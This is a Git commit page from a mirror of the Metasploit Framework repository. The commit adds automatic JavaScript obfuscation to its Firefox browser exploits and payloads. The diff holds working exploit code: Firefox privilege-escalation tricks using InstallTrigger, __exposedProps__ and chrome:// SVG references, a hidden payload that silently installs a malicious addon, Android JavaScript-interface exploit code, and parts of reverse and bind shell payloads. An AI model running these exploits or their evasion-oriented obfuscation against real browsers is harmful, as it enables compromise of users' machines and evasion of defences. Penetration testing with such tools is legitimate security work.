mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-16 01:21:15 +02:00
Land #3844 - Add the JSObfu mixin to Firefox exploits
This commit is contained in:
commit
9e5826c4eb
@ -5,7 +5,7 @@ PATH
|
||||
actionpack (< 4.0.0)
|
||||
activesupport (>= 3.0.0, < 4.0.0)
|
||||
bcrypt
|
||||
jsobfu (~> 0.1.7)
|
||||
jsobfu (~> 0.2.0)
|
||||
json
|
||||
metasploit-concern (~> 0.2.1)
|
||||
metasploit-model (~> 0.27.1)
|
||||
@ -91,7 +91,7 @@ GEM
|
||||
hike (1.2.3)
|
||||
i18n (0.6.11)
|
||||
journey (1.0.4)
|
||||
jsobfu (0.1.7)
|
||||
jsobfu (0.2.0)
|
||||
rkelly-remix (= 0.0.6)
|
||||
json (1.8.1)
|
||||
mail (2.5.4)
|
||||
|
@ -20,7 +20,7 @@ module Exploit::Android
|
||||
|
||||
def add_javascript_interface_exploit_js(arch)
|
||||
stagename = Rex::Text.rand_text_alpha(5)
|
||||
script = %Q|
|
||||
%Q|
|
||||
function exec(runtime, cmdArr) {
|
||||
var ch = 0;
|
||||
var output = '';
|
||||
@ -84,9 +84,6 @@ module Exploit::Android
|
||||
|
||||
for (i in top) { if (attemptExploit(top[i]) === true) break; }
|
||||
|
|
||||
|
||||
# remove comments and empty lines
|
||||
script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
|
||||
end
|
||||
|
||||
|
||||
|
@ -7,16 +7,24 @@
|
||||
#
|
||||
###
|
||||
|
||||
require 'msf/core/exploit/jsobfu'
|
||||
|
||||
module Msf
|
||||
module Exploit::Remote::FirefoxPrivilegeEscalation
|
||||
|
||||
# automatically obfuscate anything that runs through `js_exec`
|
||||
include Msf::Exploit::JSObfu
|
||||
|
||||
# Sends the +js+ code to the remote session, which executes it in Firefox's
|
||||
# privileged javascript context
|
||||
# privileged javascript context. The code will be obfuscated if the JsObfuscate
|
||||
# datastore option is set to 1 or higher.
|
||||
#
|
||||
# @return [String] the results that were sent back. This can be achieved through
|
||||
# calling the "send" function, or by just returning the value in +js+
|
||||
def js_exec(js, timeout=30)
|
||||
print_status "Running the privileged javascript..."
|
||||
token = "[[#{Rex::Text.rand_text_alpha(8)}]]"
|
||||
js = js_obfuscate(js)
|
||||
session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}")
|
||||
session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)
|
||||
end
|
||||
|
@ -1,9 +1,13 @@
|
||||
# -*- coding: binary -*-
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/jsobfu'
|
||||
require 'json'
|
||||
|
||||
module Msf::Payload::Firefox
|
||||
|
||||
# automatically obfuscate every Firefox payload
|
||||
include Msf::Exploit::JSObfu
|
||||
|
||||
# Javascript source code of setTimeout(fn, delay)
|
||||
# @return [String] javascript source code that exposes the setTimeout(fn, delay) method
|
||||
def set_timeout_source
|
||||
@ -121,14 +125,15 @@ module Msf::Payload::Firefox
|
||||
var retVal = null;
|
||||
|
||||
try {
|
||||
retVal = Function('send', js[1])(function(r){
|
||||
this.send = function(r){
|
||||
if (sent) return;
|
||||
sent = true;
|
||||
if (r) {
|
||||
if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
|
||||
else cb(false, r+tag+"\\n");
|
||||
}
|
||||
});
|
||||
};
|
||||
retVal = Function(js[1]).call(this);
|
||||
} catch (e) { retVal = e.message; }
|
||||
|
||||
sync = false;
|
||||
|
@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
|
||||
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
|
||||
spec.add_runtime_dependency 'bcrypt'
|
||||
# Needed for Javascript obfuscation
|
||||
spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
|
||||
spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
|
||||
# Needed for some admin modules (scrutinizer_add_user.rb)
|
||||
spec.add_runtime_dependency 'json'
|
||||
# Metasploit::Concern hooks
|
||||
|
@ -74,6 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
:os_flavor => 'Android'
|
||||
}
|
||||
))
|
||||
|
||||
deregister_options('JsObfuscate')
|
||||
end
|
||||
|
||||
# Hooked to prevent BrowserExploitServer from attempting to do JS detection
|
||||
|
@ -79,21 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
"p2.constructor.defineProperty(obj,key,{get:runme});"
|
||||
end
|
||||
|
||||
%Q|
|
||||
<html>
|
||||
<body>
|
||||
#{datastore['CONTENT']}
|
||||
<div id='payload' style='display:none'>
|
||||
if (!window.done) {
|
||||
window.AddonManager.getInstallForURL(
|
||||
'#{get_module_uri}/addon.xpi',
|
||||
function(install) { install.install() },
|
||||
'application/x-xpinstall'
|
||||
);
|
||||
window.done = true;
|
||||
}
|
||||
</div>
|
||||
<script>
|
||||
script = js_obfuscate %Q|
|
||||
try{InstallTrigger.install(0)}catch(e){p=e;};
|
||||
var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
|
||||
p2.__exposedProps__={
|
||||
@ -116,6 +102,28 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
};
|
||||
for (var i in window) register(window, i);
|
||||
for (var i in document) register(document, i);
|
||||
|
|
||||
|
||||
js_payload = js_obfuscate %Q|
|
||||
if (!window.done) {
|
||||
window.AddonManager.getInstallForURL(
|
||||
'#{get_module_uri}/addon.xpi',
|
||||
function(install) { install.install() },
|
||||
'application/x-xpinstall'
|
||||
);
|
||||
window.done = true;
|
||||
}
|
||||
|
|
||||
|
||||
%Q|
|
||||
<html>
|
||||
<body>
|
||||
#{datastore['CONTENT']}
|
||||
<div id='payload' style='display:none'>
|
||||
#{js_payload}
|
||||
</div>
|
||||
<script>
|
||||
#{script}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
@ -129,24 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
:loader_path => "#{get_module_uri}.swf",
|
||||
:content => self.datastore['CONTENT'] || ''
|
||||
}
|
||||
%Q|
|
||||
<!doctype html>
|
||||
<html>
|
||||
<head>
|
||||
<base href="chrome://browser/content/">
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
|
||||
<symbol id="#{vars[:symbol_id]}">
|
||||
<foreignObject>
|
||||
<object></object>
|
||||
</foreignObject>
|
||||
</symbol>
|
||||
<use />
|
||||
</svg>
|
||||
|
||||
<script>
|
||||
script = js_obfuscate %Q|
|
||||
var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};
|
||||
var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];
|
||||
function $() {
|
||||
@ -169,6 +152,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
document.querySelector('use').setAttributeNS(
|
||||
"http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"
|
||||
);
|
||||
|
|
||||
|
||||
%Q|
|
||||
<!doctype html>
|
||||
<html>
|
||||
<head>
|
||||
<base href="chrome://browser/content/">
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
|
||||
<symbol id="#{vars[:symbol_id]}">
|
||||
<foreignObject>
|
||||
<object></object>
|
||||
</foreignObject>
|
||||
</symbol>
|
||||
<use />
|
||||
</svg>
|
||||
|
||||
<script>
|
||||
#{script}
|
||||
</script>
|
||||
|
||||
<iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
|
||||
|
@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
key = Rex::Text.rand_text_alpha(5 + rand(12))
|
||||
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
|
||||
|
||||
js = Rex::Exploitation::JSObfu.new(%Q|
|
||||
js = js_obfuscate %Q|
|
||||
var opts = #{JSON.unparse(opts)};
|
||||
var key = opts['#{key}'];
|
||||
var y = {}, q = false;
|
||||
@ -85,9 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
return 5;
|
||||
};
|
||||
console.time(y);
|
||||
|)
|
||||
|
||||
js.obfuscate
|
||||
|
|
||||
|
||||
%Q|
|
||||
<!doctype html>
|
||||
|
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
"{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
|
||||
"'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
|
||||
|
||||
js = Rex::Exploitation::JSObfu.new(%Q|
|
||||
js = js_obfuscate %Q|
|
||||
var opts = #{JSON.unparse(opts)};
|
||||
var key = opts['#{key}'];
|
||||
|
||||
@ -127,10 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
setTimeout(function(){top.vvv.close();}, 100);
|
||||
}, 10);
|
||||
}
|
||||
|
||||
|)
|
||||
|
||||
js.obfuscate
|
||||
|
|
||||
|
||||
%Q|
|
||||
<!doctype html>
|
||||
|
@ -34,6 +34,7 @@ module Metasploit3
|
||||
<<-EOS
|
||||
|
||||
(function(){
|
||||
window = this;
|
||||
#{read_file_source if datastore['WSCRIPT']}
|
||||
#{run_cmd_source if datastore['WSCRIPT']}
|
||||
|
||||
|
@ -34,6 +34,7 @@ module Metasploit3
|
||||
def generate
|
||||
%Q|
|
||||
(function(){
|
||||
window = this;
|
||||
Components.utils.import("resource://gre/modules/NetUtil.jsm");
|
||||
var lport = #{datastore["LPORT"]};
|
||||
var rhost = "#{datastore['RHOST']}";
|
||||
|
@ -32,6 +32,8 @@ module Metasploit3
|
||||
<<-EOS
|
||||
|
||||
(function(){
|
||||
window = this;
|
||||
|
||||
Components.utils.import("resource://gre/modules/NetUtil.jsm");
|
||||
var host = '#{datastore["LHOST"]}';
|
||||
var port = #{datastore["LPORT"]};
|
||||
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Post
|
||||
} catch (e) {
|
||||
send(e);
|
||||
}
|
||||
})(send);
|
||||
})(this.send);
|
||||
|.strip
|
||||
end
|
||||
end
|
||||
|
@ -80,7 +80,7 @@ class Metasploit3 < Msf::Post
|
||||
} catch (e) {
|
||||
send(e);
|
||||
}
|
||||
})(send);
|
||||
})(this.send);
|
||||
|.strip
|
||||
end
|
||||
end
|
||||
|
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Post
|
||||
} catch (e) {
|
||||
send(e);
|
||||
}
|
||||
})(send);
|
||||
})(this.send);
|
||||
|.strip
|
||||
end
|
||||
end
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Post
|
||||
};
|
||||
|
||||
setTimeout(evt, 200);
|
||||
})(send);
|
||||
})(this.send);
|
||||
|
||||
|.strip
|
||||
end
|
||||
|
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post
|
||||
} catch (e) {
|
||||
send(e);
|
||||
}
|
||||
})(send);
|
||||
})(this.send);
|
||||
|
|
||||
end
|
||||
|
||||
|
@ -1,6 +1,5 @@
|
||||
require 'spec_helper'
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/remote/browser_exploit_server'
|
||||
|
||||
describe Msf::Exploit::Remote::BrowserExploitServer do
|
||||
|
||||
@ -58,6 +57,8 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
|
||||
server.start_service
|
||||
end
|
||||
|
||||
it_should_behave_like 'Msf::Exploit::JSObfu'
|
||||
|
||||
describe "#get_module_resource" do
|
||||
it "should give me a URI to access the exploit page" do
|
||||
module_resource = server.get_module_resource
|
||||
|
@ -0,0 +1,8 @@
|
||||
require 'spec_helper'
|
||||
require 'msf/core'
|
||||
|
||||
describe Msf::Exploit::Remote::FirefoxPrivilegeEscalation do
|
||||
|
||||
it_should_behave_like 'Msf::Exploit::JSObfu'
|
||||
|
||||
end
|
@ -3,11 +3,11 @@ require 'msf/core'
|
||||
require 'msf/core/exploit/jsobfu'
|
||||
|
||||
|
||||
describe Msf::Exploit::JSObfu do
|
||||
shared_examples_for 'Msf::Exploit::JSObfu' do
|
||||
|
||||
subject(:jsobfu) do
|
||||
mod = ::Msf::Module.new
|
||||
mod.extend described_class
|
||||
mod.send(:initialize, {})
|
||||
mod
|
||||
end
|
||||
|
||||
@ -58,4 +58,5 @@ describe Msf::Exploit::JSObfu do
|
||||
expect(obj.to_s).to include(js)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue
Block a user